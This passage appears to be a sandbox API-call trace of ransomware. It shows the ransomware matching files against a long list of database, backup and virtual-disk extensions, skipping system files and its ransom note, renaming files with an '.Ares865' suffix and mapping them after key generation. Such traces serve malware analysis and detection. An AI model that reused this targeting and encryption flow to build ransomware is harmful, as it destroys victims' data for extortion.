lpString2="qry") returned -1 [0086.936] lstrlenW (lpString="qvd") returned 3 [0086.936] lstrcmpiW (lpString1="dll", lpString2="qvd") returned -1 [0086.936] lstrlenW (lpString="rbf") returned 3 [0086.936] lstrcmpiW (lpString1="dll", lpString2="rbf") returned -1 [0086.936] lstrlenW (lpString="rctd") returned 4 [0086.936] lstrcmpiW (lpString1="_dll", lpString2="rctd") returned -1 [0086.936] lstrlenW (lpString="rod") returned 3 [0086.937] lstrcmpiW (lpString1="dll", lpString2="rod") returned -1 [0086.937] lstrlenW (lpString="rodx") returned 4 [0086.937] lstrcmpiW (lpString1="_dll", lpString2="rodx") returned -1 [0086.937] lstrlenW (lpString="rpd") returned 3 [0086.937] lstrcmpiW (lpString1="dll", lpString2="rpd") returned -1 [0086.937] lstrlenW (lpString="rsd") returned 3 [0086.937] lstrcmpiW (lpString1="dll", lpString2="rsd") returned -1 [0086.937] lstrlenW (lpString="sas7bdat") returned 8 [0086.937] lstrcmpiW (lpString1=".trx_dll", lpString2="sas7bdat") returned -1 [0086.937] lstrlenW (lpString="sbf") returned 3 [0086.937] lstrcmpiW (lpString1="dll", lpString2="sbf") returned -1 [0086.937] lstrlenW (lpString="scx") returned 3 [0086.937] lstrcmpiW (lpString1="dll", lpString2="scx") returned -1 [0086.937] lstrlenW (lpString="sdb") returned 3 [0086.937] lstrcmpiW (lpString1="dll", lpString2="sdb") returned -1 [0086.937] lstrlenW (lpString="sdc") returned 3 [0086.937] lstrcmpiW (lpString1="dll", lpString2="sdc") returned -1 [0086.937] lstrlenW (lpString="sdf") returned 3 [0086.937] lstrcmpiW (lpString1="dll", lpString2="sdf") returned -1 [0086.937] lstrlenW (lpString="sis") returned 3 [0086.937] lstrcmpiW (lpString1="dll", lpString2="sis") returned -1 [0086.937] lstrlenW (lpString="spq") returned 3 [0086.937] lstrcmpiW (lpString1="dll", lpString2="spq") returned -1 [0086.937] lstrlenW (lpString="te") returned 2 [0086.937] lstrcmpiW (lpString1="ll", lpString2="te") returned -1 [0086.937] lstrlenW (lpString="teacher") returned 7 [0086.937] lstrcmpiW (lpString1="trx_dll", lpString2="teacher") returned 1 [0086.937] lstrlenW (lpString="tmd") returned 3 [0086.937] lstrcmpiW (lpString1="dll", lpString2="tmd") returned -1 [0086.937] lstrlenW (lpString="tps") returned 3 [0086.937] lstrcmpiW (lpString1="dll", lpString2="tps") returned -1 [0086.937] lstrlenW (lpString="trc") returned 3 [0086.937] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0086.937] lstrlenW (lpString="trc") returned 3 [0086.937] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0086.937] lstrlenW (lpString="trm") returned 3 [0086.937] lstrcmpiW (lpString1="dll", lpString2="trm") returned -1 [0086.938] lstrlenW (lpString="udb") returned 3 [0086.938] lstrcmpiW (lpString1="dll", lpString2="udb") returned -1 [0086.938] lstrlenW (lpString="udl") returned 3 [0086.938] lstrcmpiW (lpString1="dll", lpString2="udl") returned -1 [0086.938] lstrlenW (lpString="usr") returned 3 [0086.938] lstrcmpiW (lpString1="dll", lpString2="usr") returned -1 [0086.938] lstrlenW (lpString="v12") returned 3 [0086.938] lstrcmpiW (lpString1="dll", lpString2="v12") returned -1 [0086.938] lstrlenW (lpString="vis") returned 3 [0086.938] lstrcmpiW (lpString1="dll", lpString2="vis") returned -1 [0086.938] lstrlenW (lpString="vpd") returned 3 [0086.938] lstrcmpiW (lpString1="dll", lpString2="vpd") returned -1 [0086.938] lstrlenW (lpString="vvv") returned 3 [0086.938] lstrcmpiW (lpString1="dll", lpString2="vvv") returned -1 [0086.938] lstrlenW (lpString="wdb") returned 3 [0086.938] lstrcmpiW (lpString1="dll", lpString2="wdb") returned -1 [0086.938] lstrlenW (lpString="wmdb") returned 4 [0086.938] lstrcmpiW (lpString1="_dll", lpString2="wmdb") returned -1 [0086.938] lstrlenW (lpString="wrk") returned 3 [0086.938] lstrcmpiW (lpString1="dll", lpString2="wrk") returned -1 [0086.938] lstrlenW (lpString="xdb") returned 3 [0086.938] lstrcmpiW (lpString1="dll", lpString2="xdb") returned -1 [0086.938] lstrlenW (lpString="xld") returned 3 [0086.938] lstrcmpiW (lpString1="dll", lpString2="xld") returned -1 [0086.938] lstrlenW (lpString="xmlff") returned 5 [0086.938] lstrcmpiW (lpString1="x_dll", lpString2="xmlff") returned -1 [0086.938] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.DLL.trx_dll.Ares865") returned 78 [0086.938] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\wwintl.dll.trx_dll"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.DLL.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\wwintl.dll.trx_dll.ares865"), dwFlags=0x1) returned 1 [0086.939] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.DLL.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\wwintl.dll.trx_dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0086.939] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=148320) returned 1 [0086.940] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0086.940] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0086.940] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0086.940] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0086.941] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0086.941] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0086.941] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x24660, lpName=0x0) returned 0x15c [0086.942] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x24660) returned 0x420000 [0087.210] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0087.211] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0087.211] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0087.211] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0087.211] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0087.211] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0087.211] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0087.211] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0087.211] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0087.211] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0087.211] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0087.211] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0087.211] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0087.211] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0087.213] CloseHandle (hObject=0x15c) returned 1 [0087.213] CloseHandle (hObject=0x118) returned 1 [0087.213] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0087.213] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0087.213] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0087.214] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa2a9c700, ftCreationTime.dwHighDateTime=0x1cacd25, ftLastAccessTime.dwLowDateTime=0xef0f07b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xa2a9c700, ftLastWriteTime.dwHighDateTime=0x1cacd25, nFileSizeHigh=0x0, nFileSizeLow=0x110b60, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WWINTL.REST.trx_dll", cAlternateFileName="WWINTL~2.TRX")) returned 1 [0087.214] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0087.214] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2="aoldtz.exe") returned 1 [0087.214] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2=".") returned 1 [0087.214] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2="..") returned 1 [0087.214] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2="windows") returned 1 [0087.214] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2="bootmgr") returned 1 [0087.214] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2="temp") returned 1 [0087.214] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2="pagefile.sys") returned 1 [0087.214] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2="boot") returned 1 [0087.214] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2="ids.txt") returned 1 [0087.214] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2="ntuser.dat") returned 1 [0087.214] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2="perflogs") returned 1 [0087.214] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2="MSBuild") returned 1 [0087.214] lstrlenW (lpString="WWINTL.REST.trx_dll") returned 19 [0087.214] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.DLL.trx_dll") returned 70 [0087.214] lstrcpyW (in: lpString1=0x2cce468, lpString2="WWINTL.REST.trx_dll" | out: lpString1="WWINTL.REST.trx_dll") returned="WWINTL.REST.trx_dll" [0087.214] lstrlenW (lpString="WWINTL.REST.trx_dll") returned 19 [0087.215] lstrlenW (lpString="Ares865") returned 7 [0087.215] lstrcmpiW (lpString1="trx_dll", lpString2="Ares865") returned 1 [0087.215] lstrlenW (lpString=".dll") returned 4 [0087.215] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2=".dll") returned 1 [0087.215] lstrlenW (lpString=".lnk") returned 4 [0087.215] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2=".lnk") returned 1 [0087.215] lstrlenW (lpString=".ini") returned 4 [0087.215] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2=".ini") returned 1 [0087.215] lstrlenW (lpString=".sys") returned 4 [0087.215] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2=".sys") returned 1 [0087.215] lstrlenW (lpString="WWINTL.REST.trx_dll") returned 19 [0087.215] lstrlenW (lpString="bak") returned 3 [0087.215] lstrcmpiW (lpString1="dll", lpString2="bak") returned 1 [0087.215] lstrlenW (lpString="ba_") returned 3 [0087.215] lstrcmpiW (lpString1="dll", lpString2="ba_") returned 1 [0087.215] lstrlenW (lpString="dbb") returned 3 [0087.215] lstrcmpiW (lpString1="dll", lpString2="dbb") returned 1 [0087.215] lstrlenW (lpString="vmdk") returned 4 [0087.215] lstrcmpiW (lpString1="_dll", lpString2="vmdk") returned -1 [0087.215] lstrlenW (lpString="rar") returned 3 [0087.215] lstrcmpiW (lpString1="dll", lpString2="rar") returned -1 [0087.215] lstrlenW (lpString="zip") returned 3 [0087.215] lstrcmpiW (lpString1="dll", lpString2="zip") returned -1 [0087.215] lstrlenW (lpString="tgz") returned 3 [0087.215] lstrcmpiW (lpString1="dll", lpString2="tgz") returned -1 [0087.215] lstrlenW (lpString="vbox") returned 4 [0087.215] lstrcmpiW (lpString1="_dll", lpString2="vbox") returned -1 [0087.215] lstrlenW (lpString="vdi") returned 3 [0087.215] lstrcmpiW (lpString1="dll", lpString2="vdi") returned -1 [0087.215] lstrlenW (lpString="vhd") returned 3 [0087.215] lstrcmpiW (lpString1="dll", lpString2="vhd") returned -1 [0087.215] lstrlenW (lpString="vhdx") returned 4 [0087.215] lstrcmpiW (lpString1="_dll", lpString2="vhdx") returned -1 [0087.215] lstrlenW (lpString="avhd") returned 4 [0087.215] lstrcmpiW (lpString1="_dll", lpString2="avhd") returned -1 [0087.215] lstrlenW (lpString="db") returned 2 [0087.215] lstrcmpiW (lpString1="ll", lpString2="db") returned 1 [0087.216] lstrlenW (lpString="db2") returned 3 [0087.216] lstrcmpiW (lpString1="dll", lpString2="db2") returned 1 [0087.216] lstrlenW (lpString="db3") returned 3 [0087.216] lstrcmpiW (lpString1="dll", lpString2="db3") returned 1 [0087.216] lstrlenW (lpString="dbf") returned 3 [0087.216] lstrcmpiW (lpString1="dll", lpString2="dbf") returned 1 [0087.216] lstrlenW (lpString="mdf") returned 3 [0087.216] lstrcmpiW (lpString1="dll", lpString2="mdf") returned -1 [0087.216] lstrlenW (lpString="mdb") returned 3 [0087.216] lstrcmpiW (lpString1="dll", lpString2="mdb") returned -1 [0087.216] lstrlenW (lpString="sql") returned 3 [0087.216] lstrcmpiW (lpString1="dll", lpString2="sql") returned -1 [0087.216] lstrlenW (lpString="sqlite") returned 6 [0087.216] lstrcmpiW (lpString1="rx_dll", lpString2="sqlite") returned -1 [0087.216] lstrlenW (lpString="sqlite3") returned 7 [0087.216] lstrcmpiW (lpString1="trx_dll", lpString2="sqlite3") returned 1 [0087.216] lstrlenW (lpString="sqlitedb") returned 8 [0087.216] lstrcmpiW (lpString1=".trx_dll", lpString2="sqlitedb") returned -1 [0087.216] lstrlenW (lpString="xml") returned 3 [0087.216] lstrcmpiW (lpString1="dll", lpString2="xml") returned -1 [0087.216] lstrlenW (lpString="$er") returned 3 [0087.216] lstrcmpiW (lpString1="dll", lpString2="$er") returned 1 [0087.216] lstrlenW (lpString="4dd") returned 3 [0087.216] lstrcmpiW (lpString1="dll", lpString2="4dd") returned 1 [0087.216] lstrlenW (lpString="4dl") returned 3 [0087.216] lstrcmpiW (lpString1="dll", lpString2="4dl") returned 1 [0087.216] lstrlenW (lpString="^^^") returned 3 [0087.216] lstrcmpiW (lpString1="dll", lpString2="^^^") returned 1 [0087.216] lstrlenW (lpString="abs") returned 3 [0087.216] lstrcmpiW (lpString1="dll", lpString2="abs") returned 1 [0087.216] lstrlenW (lpString="abx") returned 3 [0087.216] lstrcmpiW (lpString1="dll", lpString2="abx") returned 1 [0087.216] lstrlenW (lpString="accdb") returned 5 [0087.216] lstrcmpiW (lpString1="x_dll", lpString2="accdb") returned 1 [0087.216] lstrlenW (lpString="accdc") returned 5 [0087.216] lstrcmpiW (lpString1="x_dll", lpString2="accdc") returned 1 [0087.217] lstrlenW (lpString="accde") returned 5 [0087.217] lstrcmpiW (lpString1="x_dll", lpString2="accde") returned 1 [0087.217] lstrlenW (lpString="accdr") returned 5 [0087.217] lstrcmpiW (lpString1="x_dll", lpString2="accdr") returned 1 [0087.217] lstrlenW (lpString="accdt") returned 5 [0087.217] lstrcmpiW (lpString1="x_dll", lpString2="accdt") returned 1 [0087.217] lstrlenW (lpString="accdw") returned 5 [0087.217] lstrcmpiW (lpString1="x_dll", lpString2="accdw") returned 1 [0087.217] lstrlenW (lpString="accft") returned 5 [0087.217] lstrcmpiW (lpString1="x_dll", lpString2="accft") returned 1 [0087.217] lstrlenW (lpString="adb") returned 3 [0087.217] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0087.217] lstrlenW (lpString="adb") returned 3 [0087.217] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0087.217] lstrlenW (lpString="ade") returned 3 [0087.217] lstrcmpiW (lpString1="dll", lpString2="ade") returned 1 [0087.217] lstrlenW (lpString="adf") returned 3 [0087.217] lstrcmpiW (lpString1="dll", lpString2="adf") returned 1 [0087.217] lstrlenW (lpString="adn") returned 3 [0087.217] lstrcmpiW (lpString1="dll", lpString2="adn") returned 1 [0087.217] lstrlenW (lpString="adp") returned 3 [0087.217] lstrcmpiW (lpString1="dll", lpString2="adp") returned 1 [0087.217] lstrlenW (lpString="alf") returned 3 [0087.217] lstrcmpiW (lpString1="dll", lpString2="alf") returned 1 [0087.217] lstrlenW (lpString="ask") returned 3 [0087.217] lstrcmpiW (lpString1="dll", lpString2="ask") returned 1 [0087.217] lstrlenW (lpString="btr") returned 3 [0087.217] lstrcmpiW (lpString1="dll", lpString2="btr") returned 1 [0087.217] lstrlenW (lpString="cat") returned 3 [0087.217] lstrcmpiW (lpString1="dll", lpString2="cat") returned 1 [0087.217] lstrlenW (lpString="cdb") returned 3 [0087.217] lstrcmpiW (lpString1="dll", lpString2="cdb") returned 1 [0087.217] lstrlenW (lpString="ckp") returned 3 [0087.217] lstrcmpiW (lpString1="dll", lpString2="ckp") returned 1 [0087.217] lstrlenW (lpString="cma") returned 3 [0087.217] lstrcmpiW (lpString1="dll", lpString2="cma") returned 1 [0087.217] lstrlenW (lpString="cpd") returned 3 [0087.218] lstrcmpiW (lpString1="dll", lpString2="cpd") returned 1 [0087.218] lstrlenW (lpString="dacpac") returned 6 [0087.218] lstrcmpiW (lpString1="rx_dll", lpString2="dacpac") returned 1 [0087.218] lstrlenW (lpString="dad") returned 3 [0087.218] lstrcmpiW (lpString1="dll", lpString2="dad") returned 1 [0087.218] lstrlenW (lpString="dadiagrams") returned 10 [0087.218] lstrcmpiW (lpString1="ST.trx_dll", lpString2="dadiagrams") returned 1 [0087.218] lstrlenW (lpString="daschema") returned 8 [0087.218] lstrcmpiW (lpString1=".trx_dll", lpString2="daschema") returned -1 [0087.218] lstrlenW (lpString="db-journal") returned 10 [0087.218] lstrcmpiW (lpString1="ST.trx_dll", lpString2="db-journal") returned 1 [0087.218] lstrlenW (lpString="db-shm") returned 6 [0087.218] lstrcmpiW (lpString1="rx_dll", lpString2="db-shm") returned 1 [0087.218] lstrlenW (lpString="db-wal") returned 6 [0087.218] lstrcmpiW (lpString1="rx_dll", lpString2="db-wal") returned 1 [0087.218] lstrlenW (lpString="dbc") returned 3 [0087.218] lstrcmpiW (lpString1="dll", lpString2="dbc") returned 1 [0087.218] lstrlenW (lpString="dbs") returned 3 [0087.218] lstrcmpiW (lpString1="dll", lpString2="dbs") returned 1 [0087.218] lstrlenW (lpString="dbt") returned 3 [0087.218] lstrcmpiW (lpString1="dll", lpString2="dbt") returned 1 [0087.218] lstrlenW (lpString="dbv") returned 3 [0087.218] lstrcmpiW (lpString1="dll", lpString2="dbv") returned 1 [0087.218] lstrlenW (lpString="dbx") returned 3 [0087.218] lstrcmpiW (lpString1="dll", lpString2="dbx") returned 1 [0087.218] lstrlenW (lpString="dcb") returned 3 [0087.218] lstrcmpiW (lpString1="dll", lpString2="dcb") returned 1 [0087.218] lstrlenW (lpString="dct") returned 3 [0087.218] lstrcmpiW (lpString1="dll", lpString2="dct") returned 1 [0087.218] lstrlenW (lpString="dcx") returned 3 [0087.218] lstrcmpiW (lpString1="dll", lpString2="dcx") returned 1 [0087.218] lstrlenW (lpString="ddl") returned 3 [0087.218] lstrcmpiW (lpString1="dll", lpString2="ddl") returned 1 [0087.218] lstrlenW (lpString="dlis") returned 4 [0087.218] lstrcmpiW (lpString1="_dll", lpString2="dlis") returned -1 [0087.218] lstrlenW (lpString="dp1") returned 3 [0087.219] lstrcmpiW (lpString1="dll", lpString2="dp1") returned -1 [0087.219] lstrlenW (lpString="dqy") returned 3 [0087.219] lstrcmpiW (lpString1="dll", lpString2="dqy") returned -1 [0087.219] lstrlenW (lpString="dsk") returned 3 [0087.219] lstrcmpiW (lpString1="dll", lpString2="dsk") returned -1 [0087.219] lstrlenW (lpString="dsn") returned 3 [0087.219] lstrcmpiW (lpString1="dll", lpString2="dsn") returned -1 [0087.219] lstrlenW (lpString="dtsx") returned 4 [0087.219] lstrcmpiW (lpString1="_dll", lpString2="dtsx") returned -1 [0087.219] lstrlenW (lpString="dxl") returned 3 [0087.219] lstrcmpiW (lpString1="dll", lpString2="dxl") returned -1 [0087.219] lstrlenW (lpString="eco") returned 3 [0087.219] lstrcmpiW (lpString1="dll", lpString2="eco") returned -1 [0087.219] lstrlenW (lpString="ecx") returned 3 [0087.219] lstrcmpiW (lpString1="dll", lpString2="ecx") returned -1 [0087.219] lstrlenW (lpString="edb") returned 3 [0087.219] lstrcmpiW (lpString1="dll", lpString2="edb") returned -1 [0087.219] lstrlenW (lpString="epim") returned 4 [0087.219] lstrcmpiW (lpString1="_dll", lpString2="epim") returned -1 [0087.219] lstrlenW (lpString="fcd") returned 3 [0087.219] lstrcmpiW (lpString1="dll", lpString2="fcd") returned -1 [0087.219] lstrlenW (lpString="fdb") returned 3 [0087.219] lstrcmpiW (lpString1="dll", lpString2="fdb") returned -1 [0087.219] lstrlenW (lpString="fic") returned 3 [0087.219] lstrcmpiW (lpString1="dll", lpString2="fic") returned -1 [0087.219] lstrlenW (lpString="flexolibrary") returned 12 [0087.219] lstrcmpiW (lpString1="REST.trx_dll", lpString2="flexolibrary") returned 1 [0087.219] lstrlenW (lpString="fm5") returned 3 [0087.219] lstrcmpiW (lpString1="dll", lpString2="fm5") returned -1 [0087.219] lstrlenW (lpString="fmp") returned 3 [0087.219] lstrcmpiW (lpString1="dll", lpString2="fmp") returned -1 [0087.219] lstrlenW (lpString="fmp12") returned 5 [0087.219] lstrcmpiW (lpString1="x_dll", lpString2="fmp12") returned 1 [0087.219] lstrlenW (lpString="fmpsl") returned 5 [0087.219] lstrcmpiW (lpString1="x_dll", lpString2="fmpsl") returned 1 [0087.219] lstrlenW (lpString="fol") returned 3 [0087.219] lstrcmpiW (lpString1="dll", lpString2="fol") returned -1 [0087.220] lstrlenW (lpString="fp3") returned 3 [0087.220] lstrcmpiW (lpString1="dll", lpString2="fp3") returned -1 [0087.220] lstrlenW (lpString="fp4") returned 3 [0087.220] lstrcmpiW (lpString1="dll", lpString2="fp4") returned -1 [0087.220] lstrlenW (lpString="fp5") returned 3 [0087.220] lstrcmpiW (lpString1="dll", lpString2="fp5") returned -1 [0087.220] lstrlenW (lpString="fp7") returned 3 [0087.220] lstrcmpiW (lpString1="dll", lpString2="fp7") returned -1 [0087.220] lstrlenW (lpString="fpt") returned 3 [0087.220] lstrcmpiW (lpString1="dll", lpString2="fpt") returned -1 [0087.220] lstrlenW (lpString="frm") returned 3 [0087.220] lstrcmpiW (lpString1="dll", lpString2="frm") returned -1 [0087.220] lstrlenW (lpString="gdb") returned 3 [0087.220] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0087.220] lstrlenW (lpString="gdb") returned 3 [0087.220] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0087.220] lstrlenW (lpString="grdb") returned 4 [0087.220] lstrcmpiW (lpString1="_dll", lpString2="grdb") returned -1 [0087.220] lstrlenW (lpString="gwi") returned 3 [0087.220] lstrcmpiW (lpString1="dll", lpString2="gwi") returned -1 [0087.220] lstrlenW (lpString="hdb") returned 3 [0087.220] lstrcmpiW (lpString1="dll", lpString2="hdb") returned -1 [0087.220] lstrlenW (lpString="his") returned 3 [0087.220] lstrcmpiW (lpString1="dll", lpString2="his") returned -1 [0087.220] lstrlenW (lpString="ib") returned 2 [0087.220] lstrcmpiW (lpString1="ll", lpString2="ib") returned 1 [0087.220] lstrlenW (lpString="idb") returned 3 [0087.220] lstrcmpiW (lpString1="dll", lpString2="idb") returned -1 [0087.220] lstrlenW (lpString="ihx") returned 3 [0087.220] lstrcmpiW (lpString1="dll", lpString2="ihx") returned -1 [0087.220] lstrlenW (lpString="itdb") returned 4 [0087.220] lstrcmpiW (lpString1="_dll", lpString2="itdb") returned -1 [0087.220] lstrlenW (lpString="itw") returned 3 [0087.220] lstrcmpiW (lpString1="dll", lpString2="itw") returned -1 [0087.220] lstrlenW (lpString="jet") returned 3 [0087.220] lstrcmpiW (lpString1="dll", lpString2="jet") returned -1 [0087.221] lstrlenW (lpString="jtx") returned 3 [0087.221] lstrcmpiW (lpString1="dll", lpString2="jtx") returned -1 [0087.221] lstrlenW (lpString="kdb") returned 3 [0087.221] lstrcmpiW (lpString1="dll", lpString2="kdb") returned -1 [0087.221] lstrlenW (lpString="kexi") returned 4 [0087.221] lstrcmpiW (lpString1="_dll", lpString2="kexi") returned -1 [0087.221] lstrlenW (lpString="kexic") returned 5 [0087.221] lstrcmpiW (lpString1="x_dll", lpString2="kexic") returned 1 [0087.221] lstrlenW (lpString="kexis") returned 5 [0087.221] lstrcmpiW (lpString1="x_dll", lpString2="kexis") returned 1 [0087.221] lstrlenW (lpString="lgc") returned 3 [0087.221] lstrcmpiW (lpString1="dll", lpString2="lgc") returned -1 [0087.221] lstrlenW (lpString="lwx") returned 3 [0087.221] lstrcmpiW (lpString1="dll", lpString2="lwx") returned -1 [0087.221] lstrlenW (lpString="maf") returned 3 [0087.221] lstrcmpiW (lpString1="dll", lpString2="maf") returned -1 [0087.221] lstrlenW (lpString="maq") returned 3 [0087.221] lstrcmpiW (lpString1="dll", lpString2="maq") returned -1 [0087.221] lstrlenW (lpString="mar") returned 3 [0087.221] lstrcmpiW (lpString1="dll", lpString2="mar") returned -1 [0087.221] lstrlenW (lpString="marshal") returned 7 [0087.221] lstrcmpiW (lpString1="trx_dll", lpString2="marshal") returned 1 [0087.221] lstrlenW (lpString="mas") returned 3 [0087.221] lstrcmpiW (lpString1="dll", lpString2="mas") returned -1 [0087.221] lstrlenW (lpString="mav") returned 3 [0087.221] lstrcmpiW (lpString1="dll", lpString2="mav") returned -1 [0087.221] lstrlenW (lpString="maw") returned 3 [0087.221] lstrcmpiW (lpString1="dll", lpString2="maw") returned -1 [0087.221] lstrlenW (lpString="mdbhtml") returned 7 [0087.221] lstrcmpiW (lpString1="trx_dll", lpString2="mdbhtml") returned 1 [0087.221] lstrlenW (lpString="mdn") returned 3 [0087.221] lstrcmpiW (lpString1="dll", lpString2="mdn") returned -1 [0087.221] lstrlenW (lpString="mdt") returned 3 [0087.221] lstrcmpiW (lpString1="dll", lpString2="mdt") returned -1 [0087.221] lstrlenW (lpString="mfd") returned 3 [0087.221] lstrcmpiW (lpString1="dll", lpString2="mfd") returned -1 [0087.221] lstrlenW (lpString="mpd") returned 3 [0087.222] lstrcmpiW (lpString1="dll", lpString2="mpd") returned -1 [0087.222] lstrlenW (lpString="mrg") returned 3 [0087.222] lstrcmpiW (lpString1="dll", lpString2="mrg") returned -1 [0087.222] lstrlenW (lpString="mud") returned 3 [0087.222] lstrcmpiW (lpString1="dll", lpString2="mud") returned -1 [0087.222] lstrlenW (lpString="mwb") returned 3 [0087.222] lstrcmpiW (lpString1="dll", lpString2="mwb") returned -1 [0087.222] lstrlenW (lpString="myd") returned 3 [0087.222] lstrcmpiW (lpString1="dll", lpString2="myd") returned -1 [0087.222] lstrlenW (lpString="ndf") returned 3 [0087.222] lstrcmpiW (lpString1="dll", lpString2="ndf") returned -1 [0087.222] lstrlenW (lpString="nnt") returned 3 [0087.222] lstrcmpiW (lpString1="dll", lpString2="nnt") returned -1 [0087.222] lstrlenW (lpString="nrmlib") returned 6 [0087.222] lstrcmpiW (lpString1="rx_dll", lpString2="nrmlib") returned 1 [0087.222] lstrlenW (lpString="ns2") returned 3 [0087.222] lstrcmpiW (lpString1="dll", lpString2="ns2") returned -1 [0087.222] lstrlenW (lpString="ns3") returned 3 [0087.222] lstrcmpiW (lpString1="dll", lpString2="ns3") returned -1 [0087.222] lstrlenW (lpString="ns4") returned 3 [0087.222] lstrcmpiW (lpString1="dll", lpString2="ns4") returned -1 [0087.222] lstrlenW (lpString="nsf") returned 3 [0087.222] lstrcmpiW (lpString1="dll", lpString2="nsf") returned -1 [0087.222] lstrlenW (lpString="nv") returned 2 [0087.222] lstrcmpiW (lpString1="ll", lpString2="nv") returned -1 [0087.222] lstrlenW (lpString="nv2") returned 3 [0087.222] lstrcmpiW (lpString1="dll", lpString2="nv2") returned -1 [0087.222] lstrlenW (lpString="nwdb") returned 4 [0087.222] lstrcmpiW (lpString1="_dll", lpString2="nwdb") returned -1 [0087.222] lstrlenW (lpString="nyf") returned 3 [0087.222] lstrcmpiW (lpString1="dll", lpString2="nyf") returned 